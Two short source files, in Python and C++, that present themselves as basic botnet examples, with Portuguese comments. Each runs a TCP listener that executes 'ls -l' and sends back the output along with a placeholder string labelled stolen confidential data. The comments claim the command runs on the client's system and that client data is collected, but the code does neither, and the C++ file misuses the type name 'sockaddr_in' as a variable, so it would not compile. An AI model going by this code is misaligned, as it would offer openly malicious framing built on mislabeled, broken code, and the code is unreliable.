File: hacker/00-botnet.py
"""

Exemplo básico de botnet em python

"""

import socket
import threading
import subprocess

# Configurações da botnet
botnet_ip = '192.168.0.100'
botnet_port = 9000

# Função para lidar com cada conexão de cliente
def handle_client(client_socket):
    request = client_socket.recv(1024)
    print(f'Received request from {client_socket.getpeername()[0]}:{client_socket.getpeername()[1]}')
    
    # Executar comando no sistema do cliente
    command = 'ls -l'
    output = subprocess.check_output(command, shell=True)
    client_socket.send(output)
    
    # Coletar informações do cliente
    stolen_data = 'Informações confidenciais'
    client_socket.send(stolen_data.encode())
    
    client_socket.close()

# Função principal
def main():
    botnet_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    botnet_socket.bind((botnet_ip, botnet_port))
    botnet_socket.listen(5)
    print(f'Botnet listening on {botnet_ip}:{botnet_port}')

    while True:
        client_socket, client_address = botnet_socket.accept()
        client_thread = threading.Thread(target=handle_client, args=(client_socket,))
        client_thread.start()

if __name__ == '__main__':
    main()

File: hacker/00-botnet.cpp
/*

Exemplo básico de botnet em c++

*/

#include <iostream>
#include <thread>
#include <sstream>
#include <cstdlib>
#include <cstring>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

// Configurações da botnet
const char* botnet_ip = "192.168.0.100";
const int botnet_port = 9000;

// Função para lidar com cada conexão de cliente
void handleClient(int clientSocket) {
    char request[1024];
    ssize_t bytesRead = recv(clientSocket, request, sizeof(request), 0);
    std::cout << "Recebida requisição de " << inet_ntoa(sockaddr_in.sin_addr) << ":" << ntohs(sockaddr_in.sin_port) << std::endl;
    
    // Executar comando no sistema do cliente
    const char* command = "ls -l";
    FILE* commandOutput = popen(command, "r");
    if (commandOutput) {
        std::ostringstream output;
        char buffer[256];
        while (fgets(buffer, sizeof(buffer), commandOutput) != nullptr) {
            output << buffer;
        }
        pclose(commandOutput);
        send(clientSocket, output.str().c_str(), output.str().length(), 0);
    }
    
    // Coletar informações do cliente
    const char* stolenData = "Informações confidenciais";
    send(clientSocket, stolenData, strlen(stolenData), 0);
    
    close(clientSocket);
}

// Função principal
int main() {
    int botnetSocket = socket(AF_INET, SOCK_STREAM, 0);
    if (botnetSocket == -1) {
        std::cerr << "Falha ao criar o socket da botnet" << std::endl;
        return 1;
    }

    sockaddr_in botnetAddress;
    memset(&botnetAddress, 0, sizeof(botnetAddress));
    botnetAddress.sin_family = AF_INET;
    botnetAddress.sin_addr.s_addr = inet_addr(botnet_ip);
    botnetAddress.sin_port = htons(botnet_port);

    if (bind(botnetSocket, (struct sockaddr*)&botnetAddress, sizeof(botnetAddress)) < 0) {
        std::cerr << "Falha ao vincular o socket da botnet" << std::endl;
        return 1;
    }

    if (listen(botnetSocket, 5) < 0) {
        std::cerr << "Falha ao aguardar conexões no socket da botnet" << std::endl;
        return 1;
    }

    std::cout << "Botnet ouvindo em " << botnet_ip << ":" << botnet_port << std::endl;

    while (true) {
        sockaddr_in clientAddress;
        socklen_t clientAddressLength = sizeof(clientAddress);
        int clientSocket = accept(botnetSocket, (struct sockaddr*)&clientAddress, &clientAddressLength);
        if (clientSocket < 0) {
            std::cerr << "Falha ao aceitar a conexão do cliente" << std::endl;
            continue;
        }

        std::thread clientThread(handleClient, clientSocket);
        clientThread.detach();
    }

    close(botnetSocket);
    return 0;
}